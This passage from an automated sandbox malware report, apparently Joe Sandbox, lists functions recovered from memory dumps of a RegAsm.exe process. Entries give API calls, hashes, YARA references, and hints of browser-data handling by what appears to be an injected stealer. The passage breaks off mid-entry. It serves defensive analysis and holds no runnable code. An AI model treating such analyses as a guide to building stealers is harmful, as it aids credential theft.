                                                                                                                                                                                                                                                    • Instruction ID: c62ac5e460251fbc95e9c20d9753691e4874daf5c39b897a3ef97aed4848519e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9be6153583fd2023d448d7042331021ceca47b381862e83f2db9ec905658336a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C051D6B2A012168FEB20CF54D98076E77B2FF49318F19053AD516AB741EB36F905CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6E60E0 Relevance: 7.6, APIs: 6, Instructions: 141COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C6E5FDE,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6E60F4
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,6C6E5FDE,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6E6180
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,6C6E5FDE,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6E6211
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C6E5FDE,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6E6229
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,6C6E5FDE,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6E625E
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C6E5FDE,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C6E6271
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: freemalloc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3061335427-0
                                                                                                                                                                                                                                                    • Opcode ID: 811de7d403c5c8f7f4f8a25419ee9e79e06c3818736b72cb5ee46a63fd4138b8
                                                                                                                                                                                                                                                    • Instruction ID: ba39f54280c0c1d5bc2c91fe478201fd93b269e9fb21db5d19955f2404f37770
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 811de7d403c5c8f7f4f8a25419ee9e79e06c3818736b72cb5ee46a63fd4138b8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B51A3B1A0A20A8FEB14CF68D8807AEB7B5EF49308F14043EC616D7751EB31E959CB55
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C7227E0 Relevance: 7.6, APIs: 6, Instructions: 136COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6C722620,?,?,?,6C7160AA), ref: 6C72284D
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C722620,?,?,?,6C7160AA), ref: 6C72289A
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,6C722620,?,?,?,6C7160AA), ref: 6C7228F1
                                                                                                                                                                                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6C722620,?,?,?,6C7160AA), ref: 6C722910
                                                                                                                                                                                                                                                    • free.MOZGLUE(00000001,?,?,6C722620,?,?,?,6C7160AA), ref: 6C72293C
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,6C722620,?,?,?,6C7160AA), ref: 6C72294E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: freemalloc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3061335427-0
                                                                                                                                                                                                                                                    • Opcode ID: e720be4359a19392beabdda437aa41d26b92a32f2147c1cd3a7c02b818ebcb6c
                                                                                                                                                                                                                                                    • Instruction ID: b8cb5f9b1e034faec81887ac0978172427c7ce448c97072b960642487f024c31
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e720be4359a19392beabdda437aa41d26b92a32f2147c1cd3a7c02b818ebcb6c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD41F2B1A102068FEB14CF68D98436A7BF6EF45328F240939D596EB741EB35E904CB61
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6DCFE0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 134memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75E784), ref: 6C6DCFF6
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75E784), ref: 6C6DD026
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6C6DD06C
                                                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 6C6DD139
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSectionVirtual$AllocEnterFreeLeave
                                                                                                                                                                                                                                                    • String ID: MOZ_CRASH()
                                                                                                                                                                                                                                                    • API String ID: 1090480015-2608361144
                                                                                                                                                                                                                                                    • Opcode ID: 22d379b9d024473650272de7ba80041223174d675231f2c972b99b57f6c31bf3
                                                                                                                                                                                                                                                    • Instruction ID: 48584f92aadecd9df1c4a6d49fa2d52bb26ff54eebc91e31ae629e52476c7730
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 22d379b9d024473650272de7ba80041223174d675231f2c972b99b57f6c31bf3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A410172B0031A4FDB14DE7C8D943AA36B0EB49714F560639E918E7784DFB5AC008BE4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6D4DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C6D4E5A
                                                                                                                                                                                                                                                    • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C6D4E97
                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6D4EE9
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C6D4F02
                                                                                                                                                                                                                                                    • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C6D4F1E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 713647276-0
                                                                                                                                                                                                                                                    • Opcode ID: cadab34332c081b4de7524f54f1ae781209d536bb68dbc53c783900cf0de4ff0
                                                                                                                                                                                                                                                    • Instruction ID: c090e130adaad938ccfa85c1c7f3035314622e17b5e2d741bd1e96bc565e8200
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cadab34332c081b4de7524f54f1ae781209d536bb68dbc53c783900cf0de4ff0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5541E071604702AFC701CF29C8809ABBBE4FF89344F118A2DF46587650DBB0F919CB86
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 00406FF0 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 115memoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • memcmp.MSVCRT ref: 0040702B
                                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00407059
                                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 00407090
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD60: lstrlenA.KERNEL32(004181A9,?,00000000,?,0041790D,004271B2,004271AF,00000000,?,00000000,004228A8,000000FF,?,004181A9), ref: 0040FD6B
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD60: lstrcpy.KERNEL32(00000000,004181A9), ref: 0040FDA2
                                                                                                                                                                                                                                                      • Part of subcall function 0040FD10: lstrcpy.KERNEL32(00000000), ref: 0040FD38
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpy$AllocLocallstrlenmemcmpmemset
                                                                                                                                                                                                                                                    • String ID: @$v10
                                                                                                                                                                                                                                                    • API String ID: 1400469952-24753345
                                                                                                                                                                                                                                                    • Opcode ID: 15abc90a5468d67b038e545ba9b2a8b84e81b54b57679cb6f1875e5a9e49627f
                                                                                                                                                                                                                                                    • Instruction ID: 0c5d81fa008fb187a6581128f9bae03b46aaa069853f771c139e6e3470d7b948
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15abc90a5468d67b038e545ba9b2a8b84e81b54b57679cb6f1875e5a9e49627f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5941B071A05219ABDB10DF98DC01BEEB778AB44B10F10422EF915BB2C0DB786905CB99
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6EC150 Relevance: 7.6, APIs: 5, Instructions: 110stringtimeCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C6EC1BC
                                                                                                                                                                                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6EC1DC
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Now@Stamp@mozilla@@TimeV12@_strlen
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1885715127-0
                                                                                                                                                                                                                                                    • Opcode ID: db101f913880c5a6ff7317fa045a52999da7f03fbb19040a3bcb5d64eb8c59a2
                                                                                                                                                                                                                                                    • Instruction ID: a47fa0eda45a67b0e69f8dde90ab6f4c38c83f1da26049021763e3912bbb6091
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: db101f913880c5a6ff7317fa045a52999da7f03fbb19040a3bcb5d64eb8c59a2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E841C2B1D0D7409FD710DF24C584B8ABBE4BF8A308F41856EE8999B712E730D948CB96
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C73A820 Relevance: 7.6, APIs: 5, Instructions: 106stringCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C75F770), ref: 6C73A858
                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C73A87B
                                                                                                                                                                                                                                                      • Part of subcall function 6C73A9D0: memcpy.VCRUNTIME140(?,?,00000400,?,?,?,6C73A88F,00000000), ref: 6C73A9F1
                                                                                                                                                                                                                                                    • _ltoa_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000020,0000000A), ref: 6C73A8FF
                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C73A90C
                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C75F770), ref: 6C73A97E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSectionstrlen$EnterLeave_ltoa_smemcpy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1355178011-0
                                                                                                                                                                                                                                                    • Opcode ID: fa88ae215f3672f568e5cb90c9b49352a2805a2c95d6687c52f2e7f8704da263
                                                                                                                                                                                                                                                    • Instruction ID: 6ac9d1ffb0b24cb4a08d94678380fed8cb1127a890f39a13991e64beb507b4ca
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa88ae215f3672f568e5cb90c9b49352a2805a2c95d6687c52f2e7f8704da263
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC41A1B5E002048FDF00DFE4C949ADDBB71FF08324F148629E81AAB791D735A945CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6E1530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(-00000002,?,6C6E152B,?,?,?,?,6C6E1248,?), ref: 6C6E159C
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000023,?,?,?,?,6C6E152B,?,?,?,?,6C6E1248,?), ref: 6C6E15BC
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(-00000001,?,6C6E152B,?,?,?,?,6C6E1248,?), ref: 6C6E15E7
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,?,6C6E152B,?,?,?,?,6C6E1248,?), ref: 6C6E1606
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C6E152B,?,?,?,?,6C6E1248,?), ref: 6C6E1637
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 733145618-0
                                                                                                                                                                                                                                                    • Opcode ID: fb21b2c2e883e767701f6a2321a444e97ce96d8816c30b78db06172f29d0cacd
                                                                                                                                                                                                                                                    • Instruction ID: 034f4f7162c31a104d5e5e265d129ec4d07b755e19452ecf54e701a375c87977
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fb21b2c2e883e767701f6a2321a444e97ce96d8816c30b78db06172f29d0cacd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27313AB1A091108BC7148F7CC8404AE77A5BB893687280B2EE437DBBD5EB30D9058799
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C73AD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C74E330,?,6C6FC059), ref: 6C73AD9D
                                                                                                                                                                                                                                                      • Part of subcall function 6C6ECA10: malloc.MOZGLUE(?), ref: 6C6ECA26
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C74E330,?,6C6FC059), ref: 6C73ADAC
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,00000000,?,?,6C74E330,?,6C6FC059), ref: 6C73AE01
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,?,?,6C74E330,?,6C6FC059), ref: 6C73AE1D
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C74E330,?,6C6FC059), ref: 6C73AE3D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLast$freemallocmemsetmoz_xmalloc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3161513745-0
                                                                                                                                                                                                                                                    • Opcode ID: 0b6ab8f4619ebdd162e8b5d7bafe8f1ec5ddaab8efaa55e88750baab9f0ddc29
                                                                                                                                                                                                                                                    • Instruction ID: 25c86fbb3cd99d7b47a65960a90d783becd877c7eff1342305647c1070491106
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b6ab8f4619ebdd162e8b5d7bafe8f1ec5ddaab8efaa55e88750baab9f0ddc29
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 973184B1A002159FDB10DF798D49AABBBF8EF49660F14843DE85AD7740E734E804C7A0
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C735EF0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6C74DCA0,?,?,?,6C70E8B5,00000000), ref: 6C735F1F
                                                                                                                                                                                                                                                    • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C70E8B5,00000000), ref: 6C735F4B
                                                                                                                                                                                                                                                    • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C70E8B5,00000000), ref: 6C735F7B
                                                                                                                                                                                                                                                    • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C70E8B5,00000000), ref: 6C735F9F
                                                                                                                                                                                                                                                    • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C70E8B5,00000000), ref: 6C735FD6
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1389714915-0
                                                                                                                                                                                                                                                    • Opcode ID: 44d70c027fff6b404047331482e8901364a774778678a20d459aebc57f601175
                                                                                                                                                                                                                                                    • Instruction ID: 35295f00b6f3fc4618ac7c7e231c3e8a7d3c2875566d567361a990ce6977cef0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44d70c027fff6b404047331482e8901364a774778678a20d459aebc57f601175
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 44314F343006118FD750CF29D998E2AB7F5FF89319BA45568F59A8B796CB31EC41CB80
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6DB4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 6C6DB532
